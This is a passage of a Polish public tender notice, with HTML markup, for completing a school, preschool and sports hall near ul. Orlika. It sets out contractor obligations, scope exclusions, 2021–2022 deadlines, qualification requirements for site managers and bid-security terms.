dotyczy to prac ociepleniowych budynku, sufitów podwieszanych, stolarki okiennej i drzwiowej, wentylacji mechanicznej, urządzeń kotłowni itp. 12)	Zgłaszania Inspektorowi nadzoru danej branży o wykonaniu robót zanikających lub ulegających zakryciu z wyprzedzeniem 48 godzin – jeżeli Wykonawca nie wykona tego obowiązku zobowiązany będzie na własny koszt do odkrycia robót lub wykonania otworów niezbędnych do zbadania robót, a następnie do przywrócenia ich do stanu poprzedniego. 13)	W trakcie wykonywania robót stanowiących przedmiot umowy, Kierownik budowy ma obowiązek przebywania na terenie budowy. Obowiązek ten dotyczy również kierowników robót w trakcie wykonywania robót związanych bezpośrednio lub pośrednio z ich specjalnością.14)	W razie konieczności Wykonawca zobowiązany jest do opracowania na własny koszt niezbędnych projektów zabezpieczenia ścian wykopu, projektu odwodnienia wykopu i odprowadzenia wód do istniejącego w pobliżu terenu budowy rowu.15)	Prowadzenie dokumentacji budowy oraz wykonanie dokumentacji projektowej powykonawczej (po dwa egzemplarze dla każdej części (Etapu) zamówienia). Wykonawca przygotuje dokumentację projektową powykonawczą zgodnie z obowiązującymi przepisami prawa, odzwierciedlając i dokumentując stan faktyczny wykonania robót. Dokumentacja projektowa powykonawcza winna być kompletowana sukcesywnie zgodnie z postępem robót oraz udostępniana Zamawiającemu. 16)	Kierownik budowy oraz kierownicy robót mają obowiązek uczestniczenia w naradach koordynacyjnych na budowie, zwoływanych nie rzadziej niż raz na dwa tygodnie przez Koordynatora nadzoru inwestorskiego.17)	Zapewnienie obsługi geodezyjnej polegającej m.in. na wyznaczeniu wszelkich punktów pomiarowych, wytyczeniu obiektów, bieżącą obsługę budowy i montażu oraz wykonanie w trzech egzemplarzach geodezyjnej inwentaryzacji powykonawczej.18)	Usuwanie wad i usterek w ramach udzielonej przez Wykonawcę gwarancji jakości i rękojmi;19)	Uzyskanie i przekazanie Zamawiającemu wszystkich wymaganych przepisami prawa dokumentów niezbędnych do uzyskania dwóch decyzji pozwolenia na użytkowanie (tj. oddzielnie dla szkoły z przedszkolem oraz oddzielnie dla hali sportowej) łącznie z uzyskaniem pozytywnych opinii instytucji określonych w art. 56 ustawy Prawo budowlane. Decyzje pozwolenia na użytkowanie należy uzyskać przed ustalonym terminem wykonania dla danej części (Etapu) przedmiotu umowy. 20)	Zorganizowanie zaplecza budowy po uprzednim uzgodnieniu z Zamawiającym jego lokalizacji. Wykonanie ogrodzenia i oznakowania terenu budowy, ustawienie tablicy informacyjnej budowy zgodną z przepisami zawartymi w Rozporządzeniu Ministra Infrastruktury z dn. 26.04.2002 r. (tj. Dz.U. z 2018 r. poz. 963),21)	Zapewnienie na czas budowy pomieszczenia biurowego dla potrzeb organizacji narad na budowie.22)	Opracowanie i przekazanie Zamawiającemu w dwóch egzemplarzach dla każdego Etapu robót, instrukcji obsługi i eksploatacji zamontowanych na obiekcie urządzeń i instalacji oraz przeszkolenie w zakresie każdego Etapu pracowników Zamawiającego. Instrukcje winny uwzględniać wymagania dotyczące m.in.: bieżącej konserwacji oraz terminów przeprowadzenia przeglądów serwisowych.23)	Opracowanie i dostarczenie instrukcji bezpieczeństwa pożarowego oraz dostarczenie i zainstalowanie niezbędnego wyposażenia ppoż na obiekcie (w tym tablic informacyjnych, gaśnic).24)	Zapewnienie na czas budowy pomieszczenia biurowego dla potrzeb organizacji narad na budowie.25)	Ponoszenie przez okres realizacji budowy kosztów zużycia energii elektrycznej, zużycia wody, ochrony budowy.26)	Wykonawca odpowiednio opisze zamontowane tablice rozdzielcze i szafy sterownicze (oznaczy poszczególne przyciski).27)	Uporządkowanie po zakończeniu robót terenu, na którym prowadzono prace oraz dróg dojazdowych. W razie zniszczenia naprawić i przywrócić do stanu pierwotnego.28)	Wykonawca odpowiada za wywóz i utylizację odpadów po swoich robotach zgodnie z obowiązującymi przepisami. Wykonawca na żądanie Zamawiającego przedstawi dokumenty (dowody) o prawidłowym zagospodarowaniu odpadów.5. Przedmiot zamówienia nie obejmuje:1) wyposażenia ruchomego w postaci: stolików, stołów, krzeseł, biurek, dywanów;2) wykonania dostawy i montażu sprzętu sportowego oraz wykonania podłogi sportowej w pomieszczeniu hali sportowej O.C.35 o powierzchni 1107,04 m2,3) rolet zewnętrznych na oknach połaciowych (dachowych);4)	wykonania w klasach na piętrze o nr 1.B.07, 1.B.06, 1.B.10, 1.B11 zaprojektowanych ścianek w lekkiej konstrukcji. Ścianę w tym miejscu należy pomalować.5)	przedmiot umowy nie obejmuje wykonania realizowanych przekryć dachowych z niżej wyszczególnionymi robotami towarzyszącymi:a)	montaż urządzeń służących do odprowadzania wody z powierzchni dachów m.in. takich jak koryt, rynien ukrytych, rur spustowych. b)	podłączenia rur spustowych do wykonanej wokół budynku kanalizacji deszczowej zakończonej dwoma zlokalizowanymi w pobliżu rowu studniami betonowymi. c)	montaż w zakresie naziemnej części instalacji odgromowej wraz z zwodami pionowymi do ziemi;d)	montaż instalacji przeciwoblodzeniowej (w postaci kabli grzejnych) koryt, rynien ukrytych, miejsc przy wpustach do rur spustowych);e)	ocieplenia styropianem wskazanych szczytów budynku wraz z silikonowym tynkiem cienkowarstwowym typu baranek;f)	wykonanie wskazanych szczytów oraz wskazanych elewacji w technologii blachy na rąbek stojący ;6)	nie obejmuje robót wykonanych przez poprzedniego wykonawcę do dnia odstąpienia od umowy, wyszczególnionych w załącznikach do niniejszej SIWZ, w tym w załączonych Arkuszach inwentaryzacjach.7)	wykonania dostawy i montażu sprzętu sportowego oraz wykonania nawierzchni sportowej w pomieszczeniu O.C.35 o powierzchni 1107,04 m2.8)	nie obejmuje wykonania zaprojektowanych (na działce nr 1659) wzdłuż ul. Orlika: parkingów, zatoki autobusowej, chodnika - zlokalizowanych w pasie o szerokości od w/w ulicy do budynków lub ogrodzenia kompleksu, które to zostaną wykonane wraz z budową ul. Orlika (zaznaczono w projekcie). Jednakże należy wykonać w pasie o którym mowa powyżej tj. wzdłuż ul. Orlika zaprojektowane instalacje zewnętrzne m.in teletechniczną (w tym ułożenie rury osłonowej pod wdmuchnięcie światłowodu), przyłącze kanalizacyjne, dokończyć instalację deszczową oraz wykonać nasadzenia przewidziane w projekcie wykonawczym zieleni, na długości działki budowlanej wzdłuż ulicy Orlika (tuż przy budynkach kompleksu lub jego ogrodzeniu).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45400000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111291-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45300000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311200-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331210-1</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2022-01-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1)	Wykonanie Etapu I dotyczącego dokończenia budowy przedszkola, szkoły podstawowej, wykonania technologii kuchni oraz przewidzianym w tym Etapie fragmentem zagospodarowania terenu obejmującego m.in. teren przy przedszkolu wraz z wyposażeniem placu zabaw jak również wyposażeniem oraz nasadzeniami roślinności w atrium i na placu apelowym w terminie do dnia 30 lipca 2021 roku łącznie z uzyskaniem w tym terminie decyzji pozwolenia na użytkowanie.2)	Wykonanie Etapu II dotyczącego dokończenia budowy hali sportowej oraz pozostałego do wykonania zagospodarowania terenu wraz z nasadzeniami na całej długości działki budowlanej, wzdłuż ul. Orlika o szerokości od krawędzi przewidzianego chodnika (nie objętego niniejszym zamówieniem) do budynków kompleksu lub jego ogrodzenia w terminie do dnia 31 stycznia 2022 roku wraz z uzyskaniem w tym terminie decyzji pozwolenia na użytkowanie. </span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie określa warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie określa warunków w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"> Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże że:A) wykonał należycie, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie co najmniej dwie roboty budowlane o charakterze (przeznaczeniu) i złożoności porównywalnej z przedmiotem zamówienia, polegające na: 1. budowie (w rozumieniu art. 3 pkt. 6 obowiązującej ustawy Prawo budowlane) lub przebudowie (w rozumieniu art. 3 pkt. 7a obowiązującej ustawy Prawo budowlane) budynku o kubaturze co najmniej 7 000,00 m3 w zakresie wielobranżowym tj. wykonano roboty: konstrukcyjno-budowlane, wykończeniowe wraz z wykonaniem instalacji sanitarnych oraz elektrycznych - o wartości wykonanych robót minimum 4 000 000,00 zł brutto każda. 2.	wykonaniu robót budowlanych wykończeniowych (tj. po ukończeniu etapu budowy tzw. „stanem surowym otwartym”, których zakres obejmował następujące roboty tj.: wykonanie instalacji sanitarnych wraz montażem urządzeń grzewczych, elektrycznych, robót elewacyjnych, montażu stolarki okienno-drzwiowej, tynków wewnętrznych, podłóg, robót malarskich, montażu glazury – o wartości wykonanych robót minimum 3 000 000,00 zł brutto każda.Uwaga: Wykonanie dwóch robót budowlanych oznacza ich wykonanie na podstawie dwóch odrębnych umów o zakresach i wartościach wyszczególnionym w pkt. 1 i/lub w pkt. 2, np. wykonawca wykonał 2 roboty wyszczególnione w pkt. 1 lub 2 roboty wyszczególnione w pkt. 2 lub jedną robotę wyszczególnioną w pkt. 1 i jedną robotę wyszczególnioną w pkt. 2. Za zamówienia o porównywalnym do przedmiotu zamówienia charakterze (przeznaczeniu) i złożoności Zamawiający uzna wykonanie w/w robót budowlanych dotyczących obiektów/budynków wyszczególnionych w Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) w niżej podanych 3 – cyfrowych grupach:a) 126 - Ogólnodostępne obiekty kulturalne, budynki o charakterze edukacyjnym, budynki szpitali i zakładów opieki medycznej oraz budynki kultury fizycznej;b) 122 - Budynki biurowe; c)	113 - Budynki zbiorowego zamieszkania;d)	121 - Hotele i budynki zakwaterowania turystycznego;Warunek udziału w postępowaniu musi spełniać samodzielnie jeden podmiot.Nie dopuszcza się sumowania doświadczenia. Za wykonane (ukończone) roboty budowlane Zamawiający uważa roboty, w których obiekt budowlany został ukończony w taki sposób, że stanowi on całość techniczno-użytkową wraz z instalacjami i urządzeniami, dla których wystawiono dokument potwierdzający zakończenie robót np. Protokół odbioru końcowego lub Świadectwo przejęcia lub Pozwolenie na użytkowanie.B) dysponuje lub będzie dysponował minimum jedną osobą na każde z wymienionych poniżej stanowisk:1.	Przedstawiciel Wykonawcy - osoba przewidziana do zarządzania budową w zakresie organizacyjnym, administracyjnym i finansowym, posiadająca pełnomocnictwo konieczne do działania w imieniu Wykonawcy w zakresie umowy.2.	Kierownik Budowy - osoba posiadająca następujące kwalifikacje:a)	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej.	b)	doświadczenie zawodowe polegające na bezpośrednim nadzorowaniu realizacji robót budowlanych przez cały okres ich realizacji na stanowisku kierownika budowy w tym co najmniej na dwóch zakończonych robotach budowlanych, w zakresie wielobranżowym (tj. wykonano roboty konstrukcyjno-budowlane, wykończeniowe, instalacje sanitarne i elektryczne) o powierzchni użytkowej pomieszczeń objętych tym zamówieniem co najmniej 1 000,00 m2 oraz wartości wykonanych robót nie mniejszej niż 3 500 000,00 zł brutto każda.3.	Kierownik robót sanitarnych - osoba posiadająca następujące kwalifikacje:a)	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych.b)	doświadczenie zawodowe na stanowisku kierownika robót, w tym co najmniej na jednej zakończonej robocie budowlanej polegającej na wykonaniu budowy lub przebudowy obiektu kubaturowego (z wyłączeniem obiektów przemysłowych) o powierzchni użytkowej pomieszczeń objętych tym zamówieniem nie mniejszej niż 3 000,00 m2.4. Kierownik robót elektrycznych - osoba posiadająca następujące kwalifikacje: a)	uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,b)	doświadczenie zawodowe na stanowisku kierownika robót, w tym co najmniej na jednej zakończonej robocie budowlanej polegającej na wykonaniu budowy lub przebudowy obiektu kubaturowego (z wyłączeniem obiektów przemysłowych) o powierzchni użytkowej pomieszczeń objętych tym zamówieniem nie mniejszej niż 3 000,00 m2.W przypadku wspólnego biegania się o udzielenie zamówienia przez dwóch lub więcej wykonawców, powyższy warunek zostanie spełniony, jeżeli Wykonawcy wykażą, że łącznie go spełniają. Uwaga: Zamawiający nie dopuszcza, aby jedna osoba pełniła więcej niż jedną wskazaną powyżej funkcję. W przypadku złożenia przez Wykonawców dokumentów dotyczących wartości robót budowlanych zawierających dane w innych walutach niż PLN, Zamawiający, jako kurs przeliczeniowy tej waluty przyjmie średni kurs Narodowego Banku Polskiego (NBP) opublikowany na dzień daty zakończenia. Jeśli w dniu zakończenia nie była opublikowana tabela średnich kursów NBP, zastosowany zostanie kurs z ostatniej tabeli kursów średnich opublikowanej bezpośrednio przed dniem zakończenia.	Ilekroć Zamawiający wymaga określonych uprawnień budowlanych na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994 r. – Prawo budowlane (t.j. Dz. U. z 2019 r. poz. 1186 z późn. zm. – dalej „ustawa PB”), rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów prawa państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016 r., poz. 65 – dalej „ustawa o uznawaniu kwalifikacji”).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"> W celu potwierdzenia przez Wykonawcę warunków udziału w postępowaniu: a)	wykazu robót budowlanych (Załącznik nr 4) wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;b)	wykazu osób (Załącznik nr 5), skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. (Załącznik nr 6) Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Wnoszenie wadium.1.	Zamawiający określa kwotę wadium w kwocie 190 000,00 zł (słownie: sto dziewięćdziesiąt tysięcy 00/100).2.	Wadium może być wnoszone w jednej lub kilku następujących formach:1)	pieniądzu;2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;3)	gwarancjach bankowych;4)	gwarancjach ubezpieczeniowych;5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego: 09 8413 0000 0406 1311 2000 0004z dopiskiem – wadium dotyczące postępowania nr GP.ZP.271.1.20204.	Zamawiający nie dopuszcza złożenia wadium w walucie innej niż złoty polski i dotyczy to wadium składanego w każdej z możliwych form.5.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek potwierdzi, że otrzymał przelew przed upływem terminu składania ofert.6. Dowód wniesienia wadium można dołączyć do oferty lub dołączyć np. w osobnej kopercie (z dopiskiem „wadium”) do wierzchniej strony koperty zawierającej ofertę.7.	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczeń, powinny być one bezwarunkowe, nieodwołalne i płatne w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego, wykonalne na terytorium Rzeczypospolitej Polskiej, sporządzone zgodnie z obowiązującym prawem i winny zawierać następujące elementy:1)	Nazwę dającego zlecenie (Wykonawcy a przypadku oferty wspólnej Wykonawcy w imieniu wszystkich wyszczególnionych Wykonawców), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (banku lub instytucji ubezpieczeniowej udzielających gwarancji /poręczenia) oraz wskazanie ich siedzib,2)	określenie wierzytelności, która ma być zabezpieczona gwarancją(poręczeniem),3)	kwotę gwarancji(poręczenia),4)	termin ważności gwarancji(poręczenia),5)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji(poręczenia) w ciągu 14 dni na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:a)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3 a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej, lubb)	Wykonawca, którego ofertę wybrano:	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span 